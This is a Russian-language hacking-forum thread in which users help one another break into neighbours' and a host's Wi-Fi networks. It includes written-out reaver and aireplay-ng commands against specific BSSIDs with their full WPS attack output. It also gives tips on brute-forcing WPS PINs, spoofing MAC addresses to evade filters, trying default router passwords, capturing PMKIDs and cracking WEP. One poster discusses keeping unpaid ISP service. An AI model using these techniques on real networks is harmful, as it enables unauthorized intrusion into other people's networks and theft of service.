[Wi-Fi, BT] Задай вопрос - получи ответ!

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by user100, 25 Apr 2015.

  1. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,124
    Likes Received:
    1,912
    Reputations:
    24
    А разгадка проста.
    Этот говнодевайс в свое время стал настоящей легендой, и далеко не за выдающуюся надежность или производительность.
    Можно попытать счастье в kali linux, заменить mac адрес на адрес реального клиента и потихоньку перебирать пин-коды, благо, этот кусок дерьма поддается на полный перебор.
    Реализация WPS у него тоже поломана, что вполне закономерно: роутер не возвращает EAP FAIL при неправильном пин-коде, а просто не передает ничего. В результате, при переборе идут ошибки M6 timeout и перебор никуда не идет.
     
    wlk2, Triton_Mgn and hydra like this.
  2. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    54
    Likes Received:
    3
    Reputations:
    0
    Дык я не сомневался :D , ищу рецепт как из этой субстанции можно сделать что-нибудь толковое.

    Сегодня у хозяина были гости, я наблюдал сетевую активность, похоже что девайс перезагрузили, тк ошибка из лога винды пропала, но подключиться все еще не могу, тк нет ответа на четвертое сообщение:

    Code:
    [*] Trying pin "66221548"...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Message M1.
    [*] E-Nonce: 5B36F4633E08119A8153F2A6A7041017
    [*] PKE: 55AC17CA1092FB380CE453180ECDA08E4FAB2C3D5E0B3F86F18541458E32A29E7B4421A3A289241F2E9BB7A67C83DE67E23F9ED4B261B8FCD98115491030549E86264101868F9E3CBB9F8A863E88454DC59348E61943DCBDD55C55CD14E1B685F9165C14451BE83B1F3F556680F29D26E9B486A53B53CE4B519299DD9007DF8FC8DDA05E86704F9750DB15DF4CF3A8AF787FA906FAE732ECB0E6B0826B8C82D16CCFE693670A2EFC675D7306A115466F997832D29CF3B444737E24EA02F6E429
    [*] Manufacturer: D-Link
    [*] Model Name: DIR-300
    [*] Model Number: DIR-300
    [*] Serial Number: 00000000
    [*] Device Name: DIR-300
    [*] Sending WPS Message M2...
    [*] PKR: 91D113E8A230FCFAC214B1ED4A7D77B60B8178E6EA0F49481B670DCB6FB09992CCDC7A272F6C541461D3C79254978DE424A555EAFA69A31695EF733CD4CA0A22A51C327E850C0E32D4C1DCA1B24876597CD4B61B24639282B5C940C10493A8721AC9C95DB503DF4334DC11B71EC5E7D6EB004F3F660CD121FDA4B00CB2B2D14650F7372AEC554BBAD09F31F12E0429DEC52F88DB77CF242A8247D259B3F5B03189E1B1CAB2048D76BAD050C0975A0085E0853CF7D02C229679A3749978102AC0
    [*] AuthKey: C69914B9037AC6E666C0D51B608D7DD81C1D5155E18BF544D8980608134B9F9D
    [*] Received WPS Message M3.
    [*] E-Hash1: 63D2557FD05ADCD9CB3AFA18AE1078186D791FD2E77A4C940A9CECA8ECCBF3A9
    [*] E-Hash2: 10FDCE4186F7EF307CB658BADD184550DDE3E33E4FC98A1409CF51F55861FBDE
    [*] Sending WPS Message M4...
    [-] Request timed out.
    [*] Sending WPS Message M4...
    [-] Request timed out.
    [*] Sending WPS Message M4...
    [-] Session timed out.
    Поэтому начальный вопрос трансформировался:
    1. Какова вероятность подключения с кодами PIN Companion?
    2. Я пользуюсь AirSlax на портеусе, можно ли его допилить для использования raven и pixiewps, подмены mac и тд вместо kali, чтобы все что нужно было в одном месте?
    Или может быть есть более лучшее решение?
    3. Насколько понимаю подмену mac нужно делать в случае если настроена фильтрация адресов или есть еще какая-то причина?
     
    #5102 wlk2, 12 Apr 2019
    Last edited: 12 Apr 2019
  3. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    360
    Likes Received:
    657
    Reputations:
    11
    Code:
    reaver --help 2>&1 | grep DIR
        -J, --timeout-is-nack           Treat timeout as NACK (DIR-300/320)
     
    erwerr2321 and TOX1C like this.
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,684
    Likes Received:
    10,042
    Reputations:
    124
    А теперь внимание, вопрос! Если это та же самая точка, то почему используешь какой-то другой пин, а не тот, который я написал выше?

    Вряд ли эту вероятность можно рассчитать математически. Но если использовать его вместе с онлайн генератором 3WiFi, то она значительно возрастает.
    Да... надо будет в RS добавить эту фичу.
     
    Payer, xmasfore and TOX1C like this.
  5. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    54
    Likes Received:
    3
    Reputations:
    0
    Это я в качестве примера привел, у 86414227 вероятность 41%, он не подходит как и все остальные.

    Не понял как может вероятность возрастать, если генератор выдает совсем другой код?

    И еще на сайте в разделе "Оффлайн генератор WPS PIN Companion из Router Scan" для целевого девайса никаких кодов нет, а у меня в проге их два штуки, кому верить?
     
  6. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,124
    Likes Received:
    1,912
    Reputations:
    24
    Значит остается только полный перебор wps.
    Онлайн генератору, который и выдал пинкод с вероятностью 41%. Оффлайн генератор тоже полностью прав, не отдавая никаких пинов вообще. Для d-link 300/320 пин-коды не генерируются из MAC адреса, они берутся из статической последовательности. Генератор по сути, гадает пинкод, на основе пинов от роутеров с близким MAC.

    В роутерскане пинкод выводится на основе известного d-link pin и pin+1 алгоритма. Опираясь только на производителя устройства по MAC, но не на модель устройства.
    Именно так, совет был дан на случай, если подключение не проходит из-за фильтра.
     
    binarymaster likes this.
  7. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    316
    Likes Received:
    22
    Reputations:
    0
    Можно ли получить PMKID с помощью андроида ? Для этого ведь не нужны ни инжект, ни монитор способности от антенны. Можно ли каким-нибудь приложением получать PMKID там ?
     
  8. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,124
    Likes Received:
    1,912
    Reputations:
    24
    binarymaster likes this.
  9. larsenn95

    larsenn95 Member

    Joined:
    3 Oct 2015
    Messages:
    75
    Likes Received:
    18
    Reputations:
    0
    админ-1234 пробуйте в разных вариациях
     
  10. glestwid

    glestwid New Member

    Joined:
    30 Dec 2010
    Messages:
    84
    Likes Received:
    1
    Reputations:
    0
    Подскажите, для взлома WEP через aircrack-ng нужно присутствие на целевой точке присоединенных клиентов?
     
  11. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    360
    Likes Received:
    657
    Reputations:
    11
  12. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    54
    Likes Received:
    3
    Reputations:
    0
  13. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,156
    Likes Received:
    25,595
    Reputations:
    138
    Статус темы: Тема закрыта для ответов.
    Это значит, она не для Вас закрыта, а вообще!))
    А про антенны тут много есть!
     
  14. oibz

    oibz New Member

    Joined:
    27 Nov 2018
    Messages:
    9
    Likes Received:
    1
    Reputations:
    0
    Спрошу тут, или где?
    Перестал платить провайдеру за интернет почти год назад, нет мани, нет услуги , все как положено. Отключил роутер и забыл, присел на ломанный соседский. Сейчас решил проверить и включил роутер, а интернет есть!!! Провайдер старый объединился с другим, зашел в личный кабинет по старому логину, там минус 10 руб. и подпись, что услуга не предоставляется потому как не оплачено, но интернет есть!!
    Что подскажите? Сменить мак адрес ноута и пользоваться? Что это такое ваще - глюк провайдера? Какие мысли?
     
  15. hydra

    hydra Elder - Старейшина

    Joined:
    24 Jul 2015
    Messages:
    2,301
    Likes Received:
    22,368
    Reputations:
    30
    Скорее всего.
    Смена мак вряд ли спасёт.Пользоваться конечно можно.Если баг обнаружат,тебе просто пришлют счёт за весь период.Платить придётся.
    Возможно,провайдер делает это намерено.;)
     
    #5115 hydra, 14 Apr 2019
    Last edited: 14 Apr 2019
  16. aka_google

    aka_google Well-Known Member

    Joined:
    8 Jan 2010
    Messages:
    295
    Likes Received:
    1,851
    Reputations:
    2
    сервер статистики буксует , но по траффику увидят сколько пользовался , как сказал hydra платить придётся , но всё от суммы конечно зависит
     
    quite gray likes this.
  17. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    54
    Likes Received:
    3
    Reputations:
    0
    Почему-то не получается через reaver добыть пароль, зависает на сообщении Found packet with bad FCS.
    На двух точках выловил пины, использовать которые пошел в RS, на третьей даже до пина не добрался всё из-за той же ошибки:

    Code:
    root@kali:~# aireplay-ng -1 0 -a 6C:3B:6B:A2:EE:52 wlan0mon
    No source MAC (-h) specified. Using the device MAC (11:FE:ED:32:EF:58)
    10:57:05  Waiting for beacon frame (BSSID: 6C:3B:6B:A2:EE:52) on channel 4
    
    10:57:06  Sending Authentication Request (Open System)
    
    10:57:08  Sending Authentication Request (Open System)
    10:57:08  Authentication successful
    10:57:08  Sending Association Request
    
    10:57:13  Sending Authentication Request (Open System)
    
    10:57:15  Sending Authentication Request (Open System)
    10:57:15  Authentication successful
    10:57:15  Sending Association Request [ACK]
    10:57:15  Association successful :-) (AID: 1)
    
    root@kali:~# reaver -A -K -N -S -b 6C:3B:6B:A2:EE:52 -i wlan0mon
    
    Reaver v1.6.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    
    [+] Waiting for beacon from 6C:3B:6B:A2:EE:52
    [+] Received beacon from 6C:3B:6B:A2:EE:52
    [+] Associated with 6C:3B:6B:A2:EE:52 (ESSID: KIDZ)
    [!] Found packet with bad FCS, skipping...
     
    #5117 wlk2, 14 Apr 2019
    Last edited: 14 Apr 2019
  18. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,684
    Likes Received:
    10,042
    Reputations:
    124
    Я не понимаю, какой смысл использовать reaver, когда весь этот функционал в Router Scan есть, и можно добывать точки по WPS не отходя от кассы (не перезагружаясь в Linux) ?
     
    quite gray and Payer like this.
  19. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,124
    Likes Received:
    1,912
    Reputations:
    24
    Bad FCS (Frame Checksum) - битый пакет, не страшно.
    До пина не доберетесь на этой точке, ибо 6c:3b:6b = Mikrotik Routerboard, у них wps только по нажатию кнопки, пин-кода там нет.
     
  20. wlk2

    wlk2 New Member

    Joined:
    9 Apr 2019
    Messages:
    54
    Likes Received:
    3
    Reputations:
    0
    Через reaver я добыл два пина, после того как не смог этого сделать в RS:

    Code:
    [*] Associating with AP...
    [-] Association failed.
    [*] Associating with AP...
    [+] Associated with FC:F5:28:66:44:9A (ESSID: Anena).
    [*] Waiting for pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Start.
    [*] Sending WPS Message M1...
    [*] PKE: BB5A0B3E25DC09D5ADE7823DE10BA96BA597EE7244349D0465802D29601C4395BA3A1F6A4F082461D9AEDA93106762DB10DC6384B1E306701C0C3BEA0D8B63797304ACF33043210037CCA2CD50BDFEA1665320616D91601A53EC6F49C89EFAF6F9A681533AAB1764E938472DB7D02D3F34AA4D7CEB21210FF62E619C6D38BA3CD58D304A6CE7D6C601FCA5EB142C0A481A01BAAE4AE714FF8364A9A80247C802FB1D9D21D4E7D382851107B0EDF3AD3F5CA01F848934F9FE8E8DD7E2A4289375
    [*] Received WPS Message M2D.
    [*] R-Nonce: DF72D3B20C59693799A960AD087CC877
    [*] Manufacturer: ZyXEL Communications Corp.
    [*] Model Name: Home Internet Center
    [*] Model Number: KEENETIC series
    [*] Serial Number: none
    [*] Device Name: ZyXEL Internet Center
    [-] This AP is not able to service enrollee right now.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Waiting for pin ""...
    [*] Sending EAPOL Start...
    [*] Received Identity Request.
    [*] Sending Identity Response...
    [*] Received WPS Start.
    [*] Sending WPS Message M1...
    [*] PKE: D91D3629F0CBACC1CAC748F7C72C082E45DB47D3751938ED90EBE251ECA9C025887E8F3179B80C538CBA89A5D116CA9A61373A88451855792B329E8AF330327DB08CD557B9DFD2A30AF71C993A835F6F805E93A4446FA9F7922B067A8EF4D18D7E3551338C33E64F1211AB84EED64A747D2F08FE901DAE5009F0DC6C433F218D4A7EF56E9071F03BF845FC2E512781290D0DD0FD4EA9A51B99E99DC147ABB4FEF1335F752769B8E748E29F9B8AF9635358FECAED041440993938391B53396B4B
    [*] Received WPS Message M2D.
    [*] R-Nonce: DF72D3B20C59693799A960AD087CC877
    [-] This AP is not able to service enrollee right now.
    [*] Sending WSC NACK...
    [*] EAP session closed.
    [*] Waiting for pin ""...
    [*] Sending EAPOL Start...
    .
    Из одного из них удалось выловить пароль, второй пока не дается.
     
    #5120 wlk2, 14 Apr 2019
    Last edited: 14 Apr 2019
Loading...